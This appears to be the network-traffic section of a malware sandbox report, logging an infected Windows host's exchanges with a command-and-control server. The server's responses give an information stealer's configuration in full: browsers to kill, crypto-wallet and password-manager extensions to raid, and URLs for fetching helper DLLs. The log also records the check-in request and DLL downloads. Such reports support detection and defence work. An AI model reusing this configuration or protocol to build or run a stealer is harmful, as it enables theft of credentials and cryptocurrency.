                                                              Jul 6, 2024 04:22:05.783288956 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:05.783349037 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:05.783864975 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:05.784022093 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:05.784032106 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:05.784128904 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:05.784216881 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:05.784225941 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:05.784307957 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:05.784435034 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:05.784444094 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:05.784813881 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:05.785006046 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:05.785015106 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:05.785049915 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:05.785093069 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:05.785101891 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:05.785172939 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:05.785295010 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:05.788434982 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:05.788499117 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:05.788508892 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:05.788820028 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:05.788830042 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:06.216953993 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:06.217092037 CEST4973080192.168.2.495.169.205.186

                                                              HTTP Request Dependency Graph

                                                              • 95.169.205.186

                                                              HTTP Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.44973095.169.205.186805232C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jul 6, 2024 04:21:57.171740055 CEST311OUTPOST / HTTP/1.1
                                                              Accept: */*
                                                              Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                              User-Agent: MrBidenNeverKnow
                                                              Host: 95.169.205.186
                                                              Content-Length: 94
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              Data Raw: 6d 61 63 68 69 6e 65 49 64 3d 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 7c 6a 6f 6e 65 73 26 63 6f 6e 66 69 67 49 64 3d 32 33 62 37 64 65 35 31 62 62 34 32 61 35 36 39 37 33 33 66 31 65 32 36 64 62 63 65 36 33 62 61
                                                              Data Ascii: machineId=9e146be9-c76a-4720-bcdb-53011b87bd06|user&configId=23b7de51bb42a569733f1e26dbce63ba
                                                              Jul 6, 2024 04:21:57.867496014 CEST1236INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Sat, 06 Jul 2024 02:21:57 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Content-Length: 7372
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Vary: Accept-Encoding
                                                              Vary: Accept-Encoding
                                                              Content-Security-Policy: default-src 'self';base-uri 'self';block-all-mixed-content;font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
                                                              Cross-Origin-Embedder-Policy: require-corp
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Cross-Origin-Resource-Policy: same-origin
                                                              X-DNS-Prefetch-Control: off
                                                              Expect-CT: max-age=0
                                                              X-Frame-Options: SAMEORIGIN
                                                              Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                              X-Download-Options: noopen
                                                              X-Content-Type-Options: nosniff
                                                              Origin-Agent-Cluster: ?1
                                                              X-Permitted-Cross-Domain-Policies: none
                                                              Referrer-Policy: no-referrer
                                                              X-XSS-Protection: 0
                                                              ETag: W/"1ccc-+lwf4LDadcf3AVrYSKmTzrqWN4g"
                                                              Data Raw: 6b 6c 6c 70 72 63 73 73 5f 31 7c 43 68 72 6f 6d 65 2e 65 78 65 3b 62 72 6f 77 73 65 72 2e 65 78 65 3b 6d 73 65 64 67 65 2e 65 78 65 3b 63 68 72 6f 6d 65 2e 65 78 65 3b 76 69 76 61 6c 64 69 2e 65 78 65 3b 62 72 61 76 65 2e 65 78 65 3b 6f 70 65 72 61 2e 65 78 65 0a 6c 69 62 73 5f 6e 73 73 33 3a 68 74 74 70 3a 2f 2f 39 35 2e 31 36 39 2e 32 30 35 2e 31 38 36 2f 61 4e 37 6a 44 30 71 4f 36 6b 54 35 62 4b 35 62 51 34 65 52 38 66 45 31 78 50 37 68 4c 32 76 4b 2f 6e 73 73 33 2e 64 6c 6c 0a 6c 69 62 73 5f 6d 73 76 63 70 31 34 30 3a 68 74 74 70 3a 2f 2f 39 35 2e 31 36 39 2e 32 30 35 2e 31 38 36
                                                              Data Ascii: kllprcss_1|Chrome.exe;browser.exe;msedge.exe;chrome.exe;vivaldi.exe;brave.exe;opera.exelibs_nss3:http://95.169.205.186/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dlllibs_msvcp140:http://95.169.205.186
                                                              Jul 6, 2024 04:21:57.867513895 CEST1236INData Raw: 2f 61 4e 37 6a 44 30 71 4f 36 6b 54 35 62 4b 35 62 51 34 65 52 38 66 45 31 78 50 37 68 4c 32 76 4b 2f 6d 73 76 63 70 31 34 30 2e 64 6c 6c 0a 6c 69 62 73 5f 76 63 72 75 6e 74 69 6d 65 31 34 30 3a 68 74 74 70 3a 2f 2f 39 35 2e 31 36 39 2e 32 30 35
                                                              Data Ascii: /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dlllibs_vcruntime140:http://95.169.205.186/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dlllibs_mozglue:http://95.169.205.186/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dlllibs_freebl3:http://95.169
                                                              Jul 6, 2024 04:21:57.867525101 CEST1236INData Raw: 78 65 64 44 42 2a 0a 77 6c 74 73 5f 67 72 65 65 6e 3a 42 6c 6f 63 6b 73 74 72 65 61 6d 47 72 65 65 6e 3b 32 38 3b 42 6c 6f 63 6b 73 74 72 65 61 6d 5c 47 72 65 65 6e 3b 2a 3b 63 61 63 68 65 2c 67 64 6b 2c 2a 6c 6f 67 73 2a 0a 77 6c 74 73 5f 6c 65
                                                              Data Ascii: xedDB*wlts_green:BlockstreamGreen;28;Blockstream\Green;*;cache,gdk,*logs*wlts_ledger:Ledger Live;26;Ledger Live;*;*cache*,*dictionar*,*sqlite*ews_ronin_e:kjmoohlgokccodicjjfebfomlbljgfhk;Ronin;Local Extension Settingsews_meta:nkbihfbeogaea
                                                              Jul 6, 2024 04:21:57.867594957 CEST1236INData Raw: 61 6c 20 45 78 74 65 6e 73 69 6f 6e 20 53 65 74 74 69 6e 67 73 0a 65 77 73 5f 74 65 7a 62 6f 78 3a 6d 6e 66 69 66 65 66 6b 61 6a 67 6f 66 6b 63 6a 6b 65 6d 69 64 69 61 65 63 6f 63 6e 6b 6a 65 68 3b 54 65 7a 42 6f 78 3b 4c 6f 63 61 6c 20 45 78 74
                                                              Data Ascii: al Extension Settingsews_tezbox:mnfifefkajgofkcjkemidiaecocnkjeh;TezBox;Local Extension Settingsews_coin98:aeachknmefphepccionboohckonoeemg;Coin98;Local Extension Settingsews_temple:ookjlbkiijinhpmnjffcofjonbfbgaoc;Temple;Local Extension Se
                                                              Jul 6, 2024 04:21:57.867608070 CEST1236INData Raw: 70 65 62 6b 6c 6d 6e 6b 6f 65 6f 69 68 6f 66 65 63 3b 54 72 6f 6e 4c 69 6e 6b 3b 4c 6f 63 61 6c 20 45 78 74 65 6e 73 69 6f 6e 20 53 65 74 74 69 6e 67 73 0a 65 77 73 5f 62 72 61 76 65 3a 6f 64 62 66 70 65 65 69 68 64 6b 62 69 68 6d 6f 70 6b 62 6a
                                                              Data Ascii: pebklmnkoeoihofec;TronLink;Local Extension Settingsews_brave:odbfpeeihdkbihmopkbjmoonfanlbfcl;Brave;Local Extension Settingsews_meta_e:ejbalbakoplchlghecdalmeeeajnimhm;MetaMask;Local Extension Settingsews_ronin_e:kjmoohlgokccodicjjfebfomlbl
                                                              Jul 6, 2024 04:21:57.867618084 CEST1236INData Raw: 65 74 74 69 6e 67 73 0a 78 74 6e 74 6e 73 5f 61 75 74 68 65 6e 74 69 63 61 74 6f 72 63 63 3a 62 68 67 68 6f 61 6d 61 70 63 64 70 62 6f 68 70 68 69 67 6f 6f 6f 61 64 64 69 6e 70 6b 62 61 69 3b 41 75 74 68 65 6e 74 69 63 61 74 6f 72 2e 63 63 3b 53
                                                              Data Ascii: ettingsxtntns_authenticatorcc:bhghoamapcdpbohphigoooaddinpkbai;Authenticator.cc;Sync Extension Settingsxtntns_keepassxc_browser:oboonakemofpalcgghocfoadofidjkkk;KeePassXC Browser;Local Extension Settingsxtntns_keepassTusk:fmhmiaejopepamlcjk
                                                              Jul 6, 2024 04:21:57.867630005 CEST995INData Raw: 72 72 61 5f 63 3a 61 69 6a 63 62 65 64 6f 69 6a 6d 67 6e 6c 6d 6a 65 65 67 6a 61 67 6c 6d 65 70 62 6d 70 6b 70 69 3b 4c 65 61 70 54 65 72 72 61 3b 4c 6f 63 61 6c 20 45 78 74 65 6e 73 69 6f 6e 20 53 65 74 74 69 6e 67 73 0a 65 77 73 5f 70 65 74 72
                                                              Data Ascii: rra_c:aijcbedoijmgnlmjeegjaglmepbmpkpi;LeapTerra;Local Extension Settingsews_petra_atos_c:ejjladinnckdgjemekebdpeokbikhfci;Petra Aptos;Local Extension Settingsews_eternl_c:kmhcihpebfmpgmihbkipmjlmmioameka;Eternl;Local Extension Settingsews_
                                                              Jul 6, 2024 04:21:57.874243975 CEST187OUTGET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll HTTP/1.1
                                                              Content-Type: text/plain;
                                                              User-Agent: MrBidenNeverKnow
                                                              Host: 95.169.205.186
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              Jul 6, 2024 04:21:58.174139977 CEST1236INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Sat, 06 Jul 2024 02:21:57 GMT
                                                              Content-Type: application/octet-stream
                                                              Content-Length: 2042296
                                                              Connection: keep-alive
                                                              Last-Modified: Mon, 11 Apr 2022 19:39:48 GMT
                                                              ETag: "62548404-1f29b8"
                                                              Expires: Sat, 06 Jul 2024 02:51:57 GMT
                                                              Cache-Control: max-age=1800
                                                              Cache-Control: public
                                                              Accept-Ranges: bytes
                                                              Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f6 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 e0 19 00 00 26 05 00 00 00 00 00 d0 01 15 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 60 1f 00 00 04 00 00 fd d1 1f 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f8 21 1d 00 5c 9d 00 00 54 bf 1d 00 40 01 00 00 00 40 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 b8 1f 00 00 00 50 1e 00 68 0a 01 00 68 fd 1c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 f0 c4 [TRUNCATED]
                                                              Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL9b"!&`@A!\T@@xPhh\!@.texti `.rdata@@.dataN*@.00cfg0@@.rsrcx@@@.relochP@B
                                                              Jul 6, 2024 04:21:58.174165964 CEST224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                              Data Ascii: USWV]u~t@p0W~1HFDtx0W
                                                              Jul 6, 2024 04:21:58.174176931 CEST1236INData Raw: 04 31 c0 5e 5f 5b 5d c3 31 c0 85 db 0f 94 c0 c1 e0 08 48 89 46 44 eb e9 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 57 56 83 ec 10 8b 75 08 81 fe 33 27 00 00 75 37 bf 92 e8 ff ff 83 3d 18 1c 1e 10 00 74 61 a1 6c 12 1e 10 89 04 24 ff 15 60 c7
                                                              Data Ascii: 1^_[]1HFDUWVu3'u7=tal$`t:x(p,@0^_]~28wm$x($I"oOI&F !I
                                                              Jul 6, 2024 04:21:58.174263954 CEST1236INData Raw: 00 89 f0 89 fa 8d 65 f8 5e 5f 5d c3 ff 15 78 c6 1d 10 85 c0 74 c3 50 e8 35 fb ff ff 83 c4 04 31 c0 48 89 44 24 04 89 04 24 eb ae cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 0c 8b 5d 08 8b 43 18 89 45 f0 8b 43 1c 89 45 ec b9 20 00 00 00 2b 4b 08 31
                                                              Data Ascii: e^_]xtP51HD$$USWV]CECE +K1M4uGt'EH0jVuM]t}O30VuVO0SV^_[]U}uu]Uu]
                                                              Jul 6, 2024 04:21:58.174284935 CEST1236INData Raw: 0f 85 75 02 00 00 89 c2 57 e8 2f d7 13 00 83 c4 04 85 c0 ba 00 00 00 00 0f 84 f0 fe ff ff 89 c2 8b 4d ec 8b 06 89 02 8b 46 04 89 42 04 83 3e 00 0f 8e d8 fe ff ff 31 db c7 45 e8 00 00 00 00 c7 45 e0 00 00 00 00 31 c0 89 55 f0 89 45 d4 8b 7c 1e 08
                                                              Data Ascii: uW/MFB>1EE1UE|ju7UD?u|1u_DDDDLLD LDLDDE@;Mj(W-B
                                                              Jul 6, 2024 04:21:59.795488119 CEST191OUTGET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll HTTP/1.1
                                                              Content-Type: text/plain;
                                                              User-Agent: MrBidenNeverKnow
                                                              Host: 95.169.205.186
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              Jul 6, 2024 04:22:00.055085897 CEST1236INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Sat, 06 Jul 2024 02:21:59 GMT
                                                              Content-Type: application/octet-stream
                                                              Content-Length: 449280
                                                              Connection: keep-alive
                                                              Last-Modified: Mon, 11 Apr 2022 19:39:42 GMT
                                                              ETag: "625483fe-6db00"
                                                              Expires: Sat, 06 Jul 2024 02:51:59 GMT
                                                              Cache-Control: max-age=1800
                                                              Cache-Control: public
                                                              Accept-Ranges: bytes
                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9b 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED]
                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL(["!(`@@Agr?=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
                                                              Jul 6, 2024 04:22:00.346327066 CEST195OUTGET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll HTTP/1.1
                                                              Content-Type: text/plain;
                                                              User-Agent: MrBidenNeverKnow
                                                              Host: 95.169.205.186
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              Jul 6, 2024 04:22:00.570946932 CEST1236INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Sat, 06 Jul 2024 02:22:00 GMT
                                                              Content-Type: application/octet-stream
                                                              Content-Length: 80128
                                                              Connection: keep-alive
                                                              Last-Modified: Sat, 28 May 2022 21:52:46 GMT
                                                              ETag: "629299ae-13900"
                                                              Expires: Sat, 06 Jul 2024 02:52:00 GMT
                                                              Cache-Control: max-age=1800
                                                              Cache-Control: public
                                                              Accept-Ranges: bytes
                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 95 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 74 28 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL(["!0t(@A? 8 @.text `.data@.idata@@.rsrc@@.reloc @B
                                                              Jul 6, 2024 04:22:00.672668934 CEST190OUTGET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll HTTP/1.1
                                                              Content-Type: text/plain;
                                                              User-Agent: MrBidenNeverKnow
                                                              Host: 95.169.205.186
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              Jul 6, 2024 04:22:00.949625015 CEST1236INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Sat, 06 Jul 2024 02:22:00 GMT
                                                              Content-Type: application/octet-stream
                                                              Content-Length: 627128
                                                              Connection: keep-alive
                                                              Last-Modified: Mon, 11 Apr 2022 19:39:36 GMT
                                                              ETag: "625483f8-991b8"
                                                              Expires: Sat, 06 Jul 2024 02:52:00 GMT
                                                              Cache-Control: max-age=1800
                                                              Cache-Control: public
                                                              Accept-Ranges: bytes
                                                              Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d4 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 18 08 00 00 56 01 00 00 00 00 00 b0 2f 04 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 09 00 00 04 00 00 ed ee 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 ad bc 08 00 63 51 00 00 10 0e 09 00 2c 01 00 00 00 70 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 72 09 00 b8 1f 00 00 00 80 09 00 34 43 00 00 1c b0 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 57 08 00 18 00 00 00 68 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 13 [TRUNCATED]
                                                              Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL9b"!V/@AcQ,pr4CWh0.text `.rdata0@@.data0@.00cfgP @@.tls`"@.rsrcp$@@.reloc4CD.@B
                                                              Jul 6, 2024 04:22:01.340457916 CEST190OUTGET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll HTTP/1.1
                                                              Content-Type: text/plain;
                                                              User-Agent: MrBidenNeverKnow
                                                              Host: 95.169.205.186
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              Jul 6, 2024 04:22:01.615575075 CEST1236INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Sat, 06 Jul 2024 02:22:01 GMT
                                                              Content-Type: application/octet-stream
                                                              Content-Length: 684984
                                                              Connection: keep-alive
                                                              Last-Modified: Mon, 11 Apr 2022 19:40:08 GMT
                                                              ETag: "62548418-a73b8"
                                                              Expires: Sat, 06 Jul 2024 02:52:01 GMT
                                                              Cache-Control: max-age=1800
                                                              Cache-Control: public
                                                              Accept-Ranges: bytes
                                                              Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 26 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 1a 08 00 00 36 02 00 00 00 00 00 b0 1f 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 e0 0a 00 00 04 00 00 e9 81 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 34 2c 0a 00 53 00 00 00 87 2c 0a 00 c8 00 00 00 00 a0 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 54 0a 00 b8 1f 00 00 00 b0 0a 00 38 24 00 00 84 26 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 94 2e [TRUNCATED]
                                                              Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL&9b"!6@A4,S,xT8$&0.D.text `.rdata0@@.data<F@&@.00cfg(@@.rsrcx*@@.reloc8$&.@B
                                                              Jul 6, 2024 04:22:02.099942923 CEST191OUTGET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll HTTP/1.1
                                                              Content-Type: text/plain;
                                                              User-Agent: MrBidenNeverKnow
                                                              Host: 95.169.205.186
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              Jul 6, 2024 04:22:02.346249104 CEST1236INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Sat, 06 Jul 2024 02:22:02 GMT
                                                              Content-Type: application/octet-stream
                                                              Content-Length: 254392
                                                              Connection: keep-alive
                                                              Last-Modified: Mon, 11 Apr 2022 19:39:58 GMT
                                                              ETag: "6254840e-3e1b8"
                                                              Expires: Sat, 06 Jul 2024 02:52:02 GMT
                                                              Cache-Control: max-age=1800
                                                              Cache-Control: public
                                                              Accept-Ranges: bytes
                                                              Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 27 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f2 00 00 00 00 00 00 80 ce 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 a1 de 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 74 76 03 00 53 01 00 00 c7 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c2 03 00 b8 1f 00 00 00 c0 03 00 98 35 00 00 68 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 44 7b [TRUNCATED]
                                                              Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL'9b"!@AtvSw5hqD{.textV `.rdata@@.data~@.00cfg@@.rsrc@@.reloc56@B
                                                              Jul 6, 2024 04:22:02.456702948 CEST190OUTGET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll HTTP/1.1
                                                              Content-Type: text/plain;
                                                              User-Agent: MrBidenNeverKnow
                                                              Host: 95.169.205.186
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              Jul 6, 2024 04:22:02.755156040 CEST1236INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Sat, 06 Jul 2024 02:22:02 GMT
                                                              Content-Type: application/octet-stream
                                                              Content-Length: 1099223
                                                              Connection: keep-alive
                                                              Last-Modified: Mon, 11 Apr 2022 17:28:56 GMT
                                                              ETag: "62546558-10c5d7"
                                                              Expires: Sat, 06 Jul 2024 02:52:02 GMT
                                                              Cache-Control: max-age=1800
                                                              Cache-Control: public
                                                              Accept-Ranges: bytes
